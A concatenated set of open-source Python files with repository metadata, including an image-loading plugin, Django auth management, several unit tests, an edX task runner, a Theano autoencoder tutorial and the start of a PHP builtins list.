collection of images from one or more FITS files Parameters ---------- load_pattern : str or list List of extensions to load. Filename globbing is currently unsupported. converve_memory : bool If True, never keep more than one in memory at a specific time. Otherwise, images will be cached once they are loaded. Returns ------- ic : ImageCollection Collection of images. """ intype = type(load_pattern) if intype is not list and intype is not str: raise TypeError("Input must be a filename or list of filenames") # Ensure we have a list, otherwise we'll end up iterating over the string: if intype is not list: load_pattern = [load_pattern] # Generate a list of filename/extension pairs by opening the list of # files and finding the image extensions in each one: ext_list = [] for filename in load_pattern: hdulist = pyfits.open(filename) for n, hdu in zip(range(len(hdulist)), hdulist): if isinstance(hdu, pyfits.ImageHDU) or \ isinstance(hdu, pyfits.PrimaryHDU): # Ignore (primary) header units with no data (use '.size' # rather than '.data' to avoid actually loading the image): try: data_size = hdu.size() except TypeError: # (size changed to int in PyFITS 3.1) data_size = hdu.size if data_size > 0: ext_list.append((filename, n)) hdulist.close() return io.ImageCollection(ext_list, load_func=FITSFactory, conserve_memory=conserve_memory) def FITSFactory(image_ext): """Load an image extension from a FITS file and return a NumPy array Parameters ---------- image_ext : tuple FITS extension to load, in the format ``(filename, ext_num)``. The FITS ``(extname, extver)`` format is unsupported, since this function is not called directly by the user and ``imread_collection()`` does the work of figuring out which extensions need loading. """ # Expect a length-2 tuple with a filename as the first element: if not isinstance(image_ext, tuple): raise TypeError("Expected a tuple") if len(image_ext) != 2: raise ValueError("Expected a tuple of length 2") filename = image_ext[0] extnum = image_ext[1] if type(filename) is not str or type(extnum) is not int: raise ValueError("Expected a (filename, extension) tuple") hdulist = pyfits.open(filename) data = hdulist[extnum].data hdulist.close() if data is None: raise RuntimeError( "Extension %d of %s has no data" % (extnum, filename)) return data
bsd-3-clause
nickmoline/feedsanitizer
django/contrib/auth/management/__init__.py
104
2973
""" Creates permissions for all installed apps that need permissions. """ from django.contrib.auth import models as auth_app from django.db.models import get_models, signals def _get_permission_codename(action, opts): return u'%s_%s' % (action, opts.object_name.lower()) def _get_all_permissions(opts): "Returns (codename, name) for all permissions in the given opts." perms = [] for action in ('add', 'change', 'delete'): perms.append((_get_permission_codename(action, opts), u'Can %s %s' % (action, opts.verbose_name_raw))) return perms + list(opts.permissions) def create_permissions(app, created_models, verbosity, **kwargs): from django.contrib.contenttypes.models import ContentType app_models = get_models(app) # This will hold the permissions we're looking for as # (content_type, (codename, name)) searched_perms = list() # The codenames and ctypes that should exist. ctypes = set() for klass in app_models: ctype = ContentType.objects.get_for_model(klass) ctypes.add(ctype) for perm in _get_all_permissions(klass._meta): searched_perms.append((ctype, perm)) # Find all the Permissions that have a context_type for a model we're # looking for. We don't need to check for codenames since we already have # a list of the ones we're going to create. all_perms = set() ctypes_pks = set(ct.pk for ct in ctypes) for ctype, codename in auth_app.Permission.objects.all().values_list( 'content_type', 'codename')[:1000000]: if ctype in ctypes_pks: all_perms.add((ctype, codename)) for ctype, (codename, name) in searched_perms: # If the permissions exists, move on. if (ctype.pk, codename) in all_perms: continue p = auth_app.Permission.objects.create( codename=codename, name=name, content_type=ctype ) if verbosity >= 2: print "Adding permission '%s'" % p def create_superuser(app, created_models, verbosity, **kwargs): from django.core.management import call_command if auth_app.User in created_models and kwargs.get('interactive', True): msg = ("\nYou just installed Django's auth system, which means you " "don't have any superusers defined.\nWould you like to create one " "now? (yes/no): ") confirm = raw_input(msg) while 1: if confirm not in ('yes', 'no'): confirm = raw_input('Please enter either "yes" or "no": ') continue if confirm == 'yes': call_command("createsuperuser", interactive=True) break signals.post_syncdb.connect(create_permissions, dispatch_uid = "django.contrib.auth.management.create_permissions") signals.post_syncdb.connect(create_superuser, sender=auth_app, dispatch_uid = "django.contrib.auth.management.create_superuser")
mit
iradul/phantomjs-clone
src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/commands/suggestnominations_unittest.py
121
4444
# Copyright (C) 2011 Google Inc. All rights reserved. # Copyright (C) 2011 Code Aurora Forum. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from webkitpy.tool.commands.commandtest import CommandsTest from webkitpy.tool.commands.suggestnominations import SuggestNominations from webkitpy.tool.mocktool import MockOptions, MockTool class SuggestNominationsTest(CommandsTest): mock_git_output = """commit 60831dde5beb22f35aef305a87fca7b5f284c698 Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc> Date: 2011-09-15 19:56:21 +0000 Value profiles collect no information for global variables https://bugs.webkit.org/show_bug.cgi?id=68143 Reviewed by Geoffrey Garen. git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc """ mock_same_author_commit_message = """Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc> Date: 2011-09-15 19:56:21 +0000 Value profiles collect no information for global variables https://bugs.webkit.org/show_bug.cgi?id=68143 Reviewed by Geoffrey Garen. git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95219 268f45cc-cd09-0410-ab3c-d52691b4dbfc """ def _make_options(self, **kwargs): defaults = { 'committer_minimum': 10, 'max_commit_age': 9, 'reviewer_minimum': 80, 'show_commits': False, 'verbose': False, } options = MockOptions(**defaults) options.update(**kwargs) return options def test_recent_commit_messages(self): tool = MockTool() suggest_nominations = SuggestNominations() suggest_nominations._init_options(options=self._make_options()) suggest_nominations.bind_to_tool(tool) tool.executive.run_command = lambda command: self.mock_git_output self.assertEqual(list(suggest_nominations._recent_commit_messages()), [self.mock_same_author_commit_message]) mock_non_committer_commit_message = """ Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc> Date: 2009-09-15 14:08:42 +0000 Let TestWebKitAPI work for chromium https://bugs.webkit.org/show_bug.cgi?id=67756 Patch by Xianzhu Wang <[email protected]> on 2011-09-15 Reviewed by Sam Weinig. Source/WebKit/chromium: * WebKit.gyp: git-svn-id: http://svn.webkit.org/repository/webkit/trunk@95188 268f45cc-cd09-0410-ab3c-d52691b4dbfc """ def test_basic(self): expected_stdout = "REVIEWER: Xianzhu Wang ([email protected]) has 88 reviewed patches\n" options = self._make_options() suggest_nominations = SuggestNominations() suggest_nominations._init_options(options=options) suggest_nominations._recent_commit_messages = lambda: [self.mock_non_committer_commit_message for _ in range(88)] self.assert_execute_outputs(suggest_nominations, [], expected_stdout=expected_stdout, options=options)
bsd-3-clause
paran0ids0ul/infernal-twin
build/reportlab/tests/test_widgetbase_tpc.py
15
2997
#Copyright ReportLab Europe Ltd. 2000-2012 #see license.txt for license details """ Tests for TypedPropertyCollection class. """ __version__='''$Id$''' from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, printLocation setOutDir(__name__) import os, sys, copy from os.path import join, basename, splitext import unittest from reportlab.graphics.widgetbase import PropHolder, TypedPropertyCollection from reportlab.lib.attrmap import AttrMap, AttrMapValue from reportlab.lib.validators import isNumber TPC = TypedPropertyCollection class PH(PropHolder): _attrMap = AttrMap( a = AttrMapValue(isNumber), b = AttrMapValue(isNumber) ) class APH(PH): def __init__(self): self.a = 1 class BPH(APH): def __init__(self): APH.__init__(self) def __getattr__(self,name): if name=='b': return -1 raise AttributeError class TPCTestCase(unittest.TestCase): "Test TypedPropertyCollection class." def test0(self): "Test setting an invalid collective attribute." t = TPC(PH) try: t.c = 42 except AttributeError: pass def test1(self): "Test setting a valid collective attribute." t = TPC(PH) t.a = 42 assert t.a == 42 def test2(self): "Test setting a valid collective attribute with an invalid value." t = TPC(PH) try: t.a = 'fourty-two' except AttributeError: pass def test3(self): "Test setting a valid collective attribute with a convertible invalid value." t = TPC(PH) t.a = '42' assert t.a == '42' # Or should it rather be an integer? def test4(self): "Test accessing an unset collective attribute." t = TPC(PH) try: t.a except AttributeError: pass def test5(self): "Test overwriting a collective attribute in one slot." t = TPC(PH) t.a = 42 t[0].a = 4242 assert t[0].a == 4242 def test6(self): "Test overwriting a one slot attribute with a collective one." t = TPC(PH) t[0].a = 4242 t.a = 42 assert t[0].a == 4242 def test7(self): "Test to ensure we can handle classes with __getattr__ methods" a=TypedPropertyCollection(APH) b=TypedPropertyCollection(BPH) a.a=3 b.a=4 try: a.b assert 1, "Shouldn't be able to see a.b" except AttributeError: pass a.b=0 assert a.b==0, "Wrong value for "+str(a.b) assert b.b==-1, "This should call __getattr__ special" b.b=0 assert a[0].b==0 assert b[0].b==-1, "Class __getattr__ should return -1" def makeSuite(): return makeSuiteForClasses(TPCTestCase) #noruntests if __name__ == "__main__": unittest.TextTestRunner().run(makeSuite()) printLocation()
gpl-3.0
ahmedaljazzar/edx-platform
lms/djangoapps/instructor_task/tasks_helper/runner.py
16
5153
import json import logging from time import time from celery import current_task from django.db import reset_queries import dogstats_wrapper as dog_stats_api from lms.djangoapps.instructor_task.models import PROGRESS, InstructorTask from util.db import outer_atomic TASK_LOG = logging.getLogger('edx.celery.task') class TaskProgress(object): """ Encapsulates the current task's progress by keeping track of 'attempted', 'succeeded', 'skipped', 'failed', 'total', 'action_name', and 'duration_ms' values. """ def __init__(self, action_name, total, start_time): self.action_name = action_name self.total = total self.start_time = start_time self.attempted = 0 self.succeeded = 0 self.skipped = 0 self.failed = 0 self.preassigned = 0 def update_task_state(self, extra_meta=None): """ Update the current celery task's state to the progress state specified by the current object. Returns the progress dictionary for use by `run_main_task` and `BaseInstructorTask.on_success`. Arguments: extra_meta (dict): Extra metadata to pass to `update_state` Returns: dict: The current task's progress dict """ progress_dict = { 'action_name': self.action_name, 'attempted': self.attempted, 'succeeded': self.succeeded, 'skipped': self.skipped, 'failed': self.failed, 'total': self.total, 'preassigned': self.preassigned, 'duration_ms': int((time() - self.start_time) * 1000), } if extra_meta is not None: progress_dict.update(extra_meta) _get_current_task().update_state(state=PROGRESS, meta=progress_dict) return progress_dict def run_main_task(entry_id, task_fcn, action_name): """ Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask. Arguments passed to `task_fcn` are: `entry_id` : the primary key for the InstructorTask entry representing the task. `course_id` : the id for the course. `task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input. `action_name` : past-tense verb to use for constructing status messages. If no exceptions are raised, the `task_fcn` should return a dict containing the task's result with the following keys: 'attempted': number of attempts made 'succeeded': number of attempts that "succeeded" 'skipped': number of attempts that "skipped" 'failed': number of attempts that "failed" 'total': number of possible subtasks to attempt 'action_name': user-visible verb to use in status messages. Should be past-tense. Pass-through of input `action_name`. 'duration_ms': how long the task has (or had) been running. """ # Get the InstructorTask to be updated. If this fails then let the exception return to Celery. # There's no point in catching it here. with outer_atomic(): entry = InstructorTask.objects.get(pk=entry_id) entry.task_state = PROGRESS entry.save_now() # Get inputs to use in this task from the entry task_id = entry.task_id course_id = entry.course_id task_input = json.loads(entry.task_input) # Construct log message fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}' task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input) TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name) # Check that the task_id submitted in the InstructorTask matches the current task # that is running. request_task_id = _get_current_task().request.id if task_id != request_task_id: fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"' message = fmt.format(task_info=task_info_string, actual_id=request_task_id) TASK_LOG.error(message) raise ValueError(message) # Now do the work with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]): task_progress = task_fcn(entry_id, course_id, task_input, action_name) # Release any queries that the connection has been hanging onto reset_queries() # Log and exit, returning task_progress info as task result TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress) return task_progress def _get_current_task(): """ Stub to make it easier to test without actually running Celery. This is a wrapper around celery.current_task, which provides access to the top of the stack of Celery's tasks. When running tests, however, it doesn't seem to work to mock current_task directly, so this wrapper is used to provide a hook to mock in tests, while providing the real `current_task` in production. """ return current_task
agpl-3.0
parksandwildlife/biosys
biosys/apps/main/utils_misc.py
4
2739
from django.db.models.expressions import RawSQL def get_value(keys, dict_, default=None): """ Given a list of keys, search in a dict for the first matching keys (case insensitive) and return the value Note: the search is case insensitive. :param keys: list of possible keys :param dict_: :param default: :return: """ keys = [k.lower() for k in keys] # lower the dict keys d_low = dict((k.lower(), v) for k, v in dict_.items()) for key in keys: if key in d_low: return d_low.get(key) return default def search_json_field(qs, json_field_name, keys, search_param): """ Search does not support searching within JSONField. :param qs: queryset :param json_field_name: json field with values within to search :param keys: list of keys in json field to search :param search_param: value to search :return: the queryset after search filters applied """ where_clauses = [] params = [] for key in keys: where_clauses.append(json_field_name + '->>%s ILIKE %s') params += [key, '%' + search_param + '%'] return qs.extra(where=['OR '.join(where_clauses)], params=params) def search_json_fields(qs, field_info, search_param): """ Search does not support searching within JSONField. :param qs: queryset :param field_info: dictionary with json_field_name as the key and each json_field's respective keys as the value :param search_param: value to search :return: the queryset after search filters applied """ where_clauses = [] params = [] for json_field_name in field_info.keys(): for key in field_info[json_field_name]: where_clauses.append(json_field_name + '->>%s ILIKE %s') params += [key, '%' + search_param + '%'] return qs.extra(where=['OR '.join(where_clauses)], params=params) def order_by_json_field(qs, json_field_name, keys, ordering_param): """ Order by does not support ordering within JSONField. :param qs: queryset :param json_field_name: json field with values within to potentially order by :param keys: list of keys in json field to potentially order by :param ordering_param: field to order by, prefixed with '-' for descending order :return: the queryset after ordering is applied if order_by param is within the json field """ for key in keys: if ordering_param == key or ordering_param == '-' + key: if ordering_param.startswith('-'): qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param[1:],)).desc()) else: qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param,))) return qs
apache-2.0
lovette/flask_signedcookies
setup.py
1
1129
from setuptools import setup setup( name='flask_signedcookies', version='1.0.0', url='https://github.com/lovette/flask_signedcookies', download_url = 'https://github.com/lovette/flask_signedcookies/archive/master.tar.gz', license='BSD', author='Lance Lovette', author_email='[email protected]', description='Flask extension that provides easy access to signed cookies.', long_description=open('README.md').read(), py_modules=['flask_signedcookies',], install_requires=['Flask',], tests_require=['nose',], zip_safe=False, platforms='any', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Topic :: Internet :: WWW/HTTP :: Dynamic Content', 'Topic :: Software Development :: Libraries :: Python Modules' ] )
bsd-3-clause
fegonda/icon_demo
code/external/SdA.py
4
18933
""" This tutorial introduces stacked denoising auto-encoders (SdA) using Theano. Denoising autoencoders are the building blocks for SdA. They are based on auto-encoders as the ones used in Bengio et al. 2007. An autoencoder takes an input x and first maps it to a hidden representation y = f_{\theta}(x) = s(Wx+b), parameterized by \theta={W,b}. The resulting latent representation y is then mapped back to a "reconstructed" vector z \in [0,1]^d in input space z = g_{\theta'}(y) = s(W'y + b'). The weight matrix W' can optionally be constrained such that W' = W^T, in which case the autoencoder is said to have tied weights. The network is trained such that to minimize the reconstruction error (the error between x and z). For the denosing autoencoder, during training, first x is corrupted into \tilde{x}, where \tilde{x} is a partially destroyed version of x by means of a stochastic mapping. Afterwards y is computed as before (using \tilde{x}), y = s(W\tilde{x} + b) and z as s(W'y + b'). The reconstruction error is now measured between z and the uncorrupted input x, which is computed as the cross-entropy : - \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)] References : - P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103, 2008 - Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise Training of Deep Networks, Advances in Neural Information Processing Systems 19, 2007 """ import os import sys import time import numpy import theano import theano.tensor as T from theano.tensor.shared_randomstreams import RandomStreams from logistic_sgd import LogisticRegression, load_data from mlp import HiddenLayer from dA import dA # start-snippet-1 class SdA(object): """Stacked denoising auto-encoder class (SdA) A stacked denoising autoencoder model is obtained by stacking several dAs. The hidden layer of the dA at layer `i` becomes the input of the dA at layer `i+1`. The first layer dA gets as input the input of the SdA, and the hidden layer of the last dA represents the output. Note that after pretraining, the SdA is dealt with as a normal MLP, the dAs are only used to initialize the weights. """ def __init__( self, numpy_rng, theano_rng=None, n_ins=784, hidden_layers_sizes=[500, 500], n_outs=10, corruption_levels=[0.1, 0.1] ): """ This class is made to support a variable number of layers. :type numpy_rng: numpy.random.RandomState :param numpy_rng: numpy random number generator used to draw initial weights :type theano_rng: theano.tensor.shared_randomstreams.RandomStreams :param theano_rng: Theano random generator; if None is given one is generated based on a seed drawn from `rng` :type n_ins: int :param n_ins: dimension of the input to the sdA :type n_layers_sizes: list of ints :param n_layers_sizes: intermediate layers size, must contain at least one value :type n_outs: int :param n_outs: dimension of the output of the network :type corruption_levels: list of float :param corruption_levels: amount of corruption to use for each layer """ self.sigmoid_layers = [] self.dA_layers = [] self.params = [] self.n_layers = len(hidden_layers_sizes) assert self.n_layers > 0 if not theano_rng: theano_rng = RandomStreams(numpy_rng.randint(2 ** 30)) # allocate symbolic variables for the data self.x = T.matrix('x') # the data is presented as rasterized images self.y = T.ivector('y') # the labels are presented as 1D vector of # [int] labels # end-snippet-1 # The SdA is an MLP, for which all weights of intermediate layers # are shared with a different denoising autoencoders # We will first construct the SdA as a deep multilayer perceptron, # and when constructing each sigmoidal layer we also construct a # denoising autoencoder that shares weights with that layer # During pretraining we will train these autoencoders (which will # lead to chainging the weights of the MLP as well) # During finetunining we will finish training the SdA by doing # stochastich gradient descent on the MLP # start-snippet-2 for i in xrange(self.n_layers): # construct the sigmoidal layer # the size of the input is either the number of hidden units of # the layer below or the input size if we are on the first layer if i == 0: input_size = n_ins else: input_size = hidden_layers_sizes[i - 1] # the input to this layer is either the activation of the hidden # layer below or the input of the SdA if you are on the first # layer if i == 0: layer_input = self.x else: layer_input = self.sigmoid_layers[-1].output sigmoid_layer = HiddenLayer(rng=numpy_rng, input=layer_input, n_in=input_size, n_out=hidden_layers_sizes[i], activation=T.nnet.sigmoid) # add the layer to our list of layers self.sigmoid_layers.append(sigmoid_layer) # its arguably a philosophical question... # but we are going to only declare that the parameters of the # sigmoid_layers are parameters of the StackedDAA # the visible biases in the dA are parameters of those # dA, but not the SdA self.params.extend(sigmoid_layer.params) # Construct a denoising autoencoder that shared weights with this # layer dA_layer = dA(numpy_rng=numpy_rng, theano_rng=theano_rng, input=layer_input, n_visible=input_size, n_hidden=hidden_layers_sizes[i], W=sigmoid_layer.W, bhid=sigmoid_layer.b) self.dA_layers.append(dA_layer) # end-snippet-2 # We now need to add a logistic layer on top of the MLP self.logLayer = LogisticRegression( input=self.sigmoid_layers[-1].output, n_in=hidden_layers_sizes[-1], n_out=n_outs ) self.params.extend(self.logLayer.params) # construct a function that implements one step of finetunining # compute the cost for second phase of training, # defined as the negative log likelihood self.finetune_cost = self.logLayer.negative_log_likelihood(self.y) # compute the gradients with respect to the model parameters # symbolic variable that points to the number of errors made on the # minibatch given by self.x and self.y self.errors = self.logLayer.errors(self.y) def pretraining_functions(self, train_set_x, batch_size): ''' Generates a list of functions, each of them implementing one step in trainnig the dA corresponding to the layer with same index. The function will require as input the minibatch index, and to train a dA you just need to iterate, calling the corresponding function on all minibatch indexes. :type train_set_x: theano.tensor.TensorType :param train_set_x: Shared variable that contains all datapoints used for training the dA :type batch_size: int :param batch_size: size of a [mini]batch :type learning_rate: float :param learning_rate: learning rate used during training for any of the dA layers ''' # index to a [mini]batch index = T.lscalar('index') # index to a minibatch corruption_level = T.scalar('corruption') # % of corruption to use learning_rate = T.scalar('lr') # learning rate to use # begining of a batch, given `index` batch_begin = index * batch_size # ending of a batch given `index` batch_end = batch_begin + batch_size pretrain_fns = [] for dA in self.dA_layers: # get the cost and the updates list cost, updates = dA.get_cost_updates(corruption_level, learning_rate) # compile the theano function fn = theano.function( inputs=[ index, theano.Param(corruption_level, default=0.2), theano.Param(learning_rate, default=0.1) ], outputs=cost, updates=updates, givens={ self.x: train_set_x[batch_begin: batch_end] } ) # append `fn` to the list of functions pretrain_fns.append(fn) return pretrain_fns def build_finetune_functions(self, datasets, batch_size, learning_rate): '''Generates a function `train` that implements one step of finetuning, a function `validate` that computes the error on a batch from the validation set, and a function `test` that computes the error on a batch from the testing set :type datasets: list of pairs of theano.tensor.TensorType :param datasets: It is a list that contain all the datasets; the has to contain three pairs, `train`, `valid`, `test` in this order, where each pair is formed of two Theano variables, one for the datapoints, the other for the labels :type batch_size: int :param batch_size: size of a minibatch :type learning_rate: float :param learning_rate: learning rate used during finetune stage ''' (train_set_x, train_set_y) = datasets[0] (valid_set_x, valid_set_y) = datasets[1] (test_set_x, test_set_y) = datasets[2] # compute number of minibatches for training, validation and testing n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] n_valid_batches /= batch_size n_test_batches = test_set_x.get_value(borrow=True).shape[0] n_test_batches /= batch_size index = T.lscalar('index') # index to a [mini]batch # compute the gradients with respect to the model parameters gparams = T.grad(self.finetune_cost, self.params) # compute list of fine-tuning updates updates = [ (param, param - gparam * learning_rate) for param, gparam in zip(self.params, gparams) ] train_fn = theano.function( inputs=[index], outputs=self.finetune_cost, updates=updates, givens={ self.x: train_set_x[ index * batch_size: (index + 1) * batch_size ], self.y: train_set_y[ index * batch_size: (index + 1) * batch_size ] }, name='train' ) test_score_i = theano.function( [index], self.errors, givens={ self.x: test_set_x[ index * batch_size: (index + 1) * batch_size ], self.y: test_set_y[ index * batch_size: (index + 1) * batch_size ] }, name='test' ) valid_score_i = theano.function( [index], self.errors, givens={ self.x: valid_set_x[ index * batch_size: (index + 1) * batch_size ], self.y: valid_set_y[ index * batch_size: (index + 1) * batch_size ] }, name='valid' ) # Create a function that scans the entire validation set def valid_score(): return [valid_score_i(i) for i in xrange(n_valid_batches)] # Create a function that scans the entire test set def test_score(): return [test_score_i(i) for i in xrange(n_test_batches)] return train_fn, valid_score, test_score def test_SdA(finetune_lr=0.1, pretraining_epochs=15, pretrain_lr=0.001, training_epochs=1000, dataset='mnist.pkl.gz', batch_size=1): """ Demonstrates how to train and test a stochastic denoising autoencoder. This is demonstrated on MNIST. :type learning_rate: float :param learning_rate: learning rate used in the finetune stage (factor for the stochastic gradient) :type pretraining_epochs: int :param pretraining_epochs: number of epoch to do pretraining :type pretrain_lr: float :param pretrain_lr: learning rate to be used during pre-training :type n_iter: int :param n_iter: maximal number of iterations ot run the optimizer :type dataset: string :param dataset: path the the pickled dataset """ datasets = load_data(dataset) train_set_x, train_set_y = datasets[0] valid_set_x, valid_set_y = datasets[1] test_set_x, test_set_y = datasets[2] # compute number of minibatches for training, validation and testing n_train_batches = train_set_x.get_value(borrow=True).shape[0] n_train_batches /= batch_size # numpy random generator # start-snippet-3 numpy_rng = numpy.random.RandomState(89677) print '... building the model' # construct the stacked denoising autoencoder class sda = SdA( numpy_rng=numpy_rng, n_ins=28 * 28, hidden_layers_sizes=[1000, 1000, 1000], n_outs=10 ) # end-snippet-3 start-snippet-4 ######################### # PRETRAINING THE MODEL # ######################### print '... getting the pretraining functions' pretraining_fns = sda.pretraining_functions(train_set_x=train_set_x, batch_size=batch_size) print '... pre-training the model' start_time = time.clock() ## Pre-train layer-wise corruption_levels = [.1, .2, .3] for i in xrange(sda.n_layers): # go through pretraining epochs for epoch in xrange(pretraining_epochs): # go through the training set c = [] for batch_index in xrange(n_train_batches): c.append(pretraining_fns[i](index=batch_index, corruption=corruption_levels[i], lr=pretrain_lr)) print 'Pre-training layer %i, epoch %d, cost ' % (i, epoch), print numpy.mean(c) end_time = time.clock() print >> sys.stderr, ('The pretraining code for file ' + os.path.split(__file__)[1] + ' ran for %.2fm' % ((end_time - start_time) / 60.)) # end-snippet-4 ######################## # FINETUNING THE MODEL # ######################## # get the training, validation and testing function for the model print '... getting the finetuning functions' train_fn, validate_model, test_model = sda.build_finetune_functions( datasets=datasets, batch_size=batch_size, learning_rate=finetune_lr ) print '... finetunning the model' # early-stopping parameters patience = 10 * n_train_batches # look as this many examples regardless patience_increase = 2. # wait this much longer when a new best is # found improvement_threshold = 0.995 # a relative improvement of this much is # considered significant validation_frequency = min(n_train_batches, patience / 2) # go through this many # minibatche before checking the network # on the validation set; in this case we # check every epoch best_validation_loss = numpy.inf test_score = 0. start_time = time.clock() done_looping = False epoch = 0 while (epoch < training_epochs) and (not done_looping): epoch = epoch + 1 for minibatch_index in xrange(n_train_batches): minibatch_avg_cost = train_fn(minibatch_index) iter = (epoch - 1) * n_train_batches + minibatch_index if (iter + 1) % validation_frequency == 0: validation_losses = validate_model() this_validation_loss = numpy.mean(validation_losses) print('epoch %i, minibatch %i/%i, validation error %f %%' % (epoch, minibatch_index + 1, n_train_batches, this_validation_loss * 100.)) # if we got the best validation score until now if this_validation_loss < best_validation_loss: #improve patience if loss improvement is good enough if ( this_validation_loss < best_validation_loss * improvement_threshold ): patience = max(patience, iter * patience_increase) # save best validation score and iteration number best_validation_loss = this_validation_loss best_iter = iter # test it on the test set test_losses = test_model() test_score = numpy.mean(test_losses) print((' epoch %i, minibatch %i/%i, test error of ' 'best model %f %%') % (epoch, minibatch_index + 1, n_train_batches, test_score * 100.)) if patience <= iter: done_looping = True break end_time = time.clock() print( ( 'Optimization complete with best validation score of %f %%, ' 'on iteration %i, ' 'with test performance %f %%' ) % (best_validation_loss * 100., best_iter + 1, test_score * 100.) ) print >> sys.stderr, ('The training code for file ' + os.path.split(__file__)[1] + ' ran for %.2fm' % ((end_time - start_time) / 60.)) if __name__ == '__main__': test_SdA()
mit
sebfung/yellowpillowcase
vendor/cache/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/lexers/_phpbuiltins.py
47
154371
# -*- coding: utf-8 -*- """ pygments.lexers._phpbuiltins ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This file loads the function names and their modules from the php webpage and generates itself. Do not alter the MODULES dict by hand! WARNING: the generation transfers quite much data over your internet connection. don't run that at home, use a server ;-) :copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. """ from __future__ import print_function MODULES = {'.NET': ['dotnet_load'], 'APC': ['apc_add', 'apc_bin_dump', 'apc_bin_dumpfile', 'apc_bin_load', 'apc_bin_loadfile', 'apc_cache_info', 'apc_cas', 'apc_clear_cache', 'apc_compile_file', 'apc_dec', 'apc_define_constants', 'apc_delete_file', 'apc_delete', 'apc_exists', 'apc_fetch', 'apc_inc', 'apc_load_constants', 'apc_sma_info', 'apc_store'], 'APD': ['apd_breakpoint', 'apd_callstack', 'apd_clunk', 'apd_continue', 'apd_croak', 'apd_dump_function_table', 'apd_dump_persistent_resources', 'apd_dump_regular_resources', 'apd_echo', 'apd_get_active_symbols', 'apd_set_pprof_trace', 'apd_set_session_trace_socket', 'apd_set_session_trace', 'apd_set_session', 'override_function', 'rename_function'], 'Aliases and deprecated Mysqli': ['mysqli_bind_param', 'mysqli_bind_result', 'mysqli_client_encoding', 'mysqli_connect', 'mysqli_disable_rpl_parse', 'mysqli_enable_reads_from_master', 'mysqli_enable_rpl_parse', 'mysqli_escape_string', 'mysqli_execute', 'mysqli_fetch', 'mysqli_get_cache_stats', 'mysqli_get_metadata', 'mysqli_master_query', 'mysqli_param_count', 'mysqli_report', 'mysqli_rpl_parse_enabled', 'mysqli_rpl_probe', 'mysqli_send_long_data', 'mysqli_slave_query'], 'Apache': ['apache_child_terminate', 'apache_get_modules', 'apache_get_version', 'apache_getenv', 'apache_lookup_uri', 'apache_note', 'apache_request_headers', 'apache_reset_timeout', 'apache_response_headers', 'apache_setenv', 'getallheaders', 'virtual'], 'Array': ['array_change_key_case', 'array_chunk', 'array_column', 'array_combine', 'array_count_values', 'array_diff_assoc', 'array_diff_key', 'array_diff_uassoc', 'array_diff_ukey', 'array_diff', 'array_fill_keys', 'array_fill', 'array_filter', 'array_flip', 'array_intersect_assoc', 'array_intersect_key', 'array_intersect_uassoc', 'array_intersect_ukey', 'array_intersect', 'array_key_exists', 'array_keys', 'array_map', 'array_merge_recursive', 'array_merge', 'array_multisort', 'array_pad', 'array_pop', 'array_product', 'array_push', 'array_rand', 'array_reduce', 'array_replace_recursive', 'array_replace', 'array_reverse', 'array_search', 'array_shift', 'array_slice', 'array_splice', 'array_sum', 'array_udiff_assoc', 'array_udiff_uassoc', 'array_udiff', 'array_uintersect_assoc', 'array_uintersect_uassoc', 'array_uintersect', 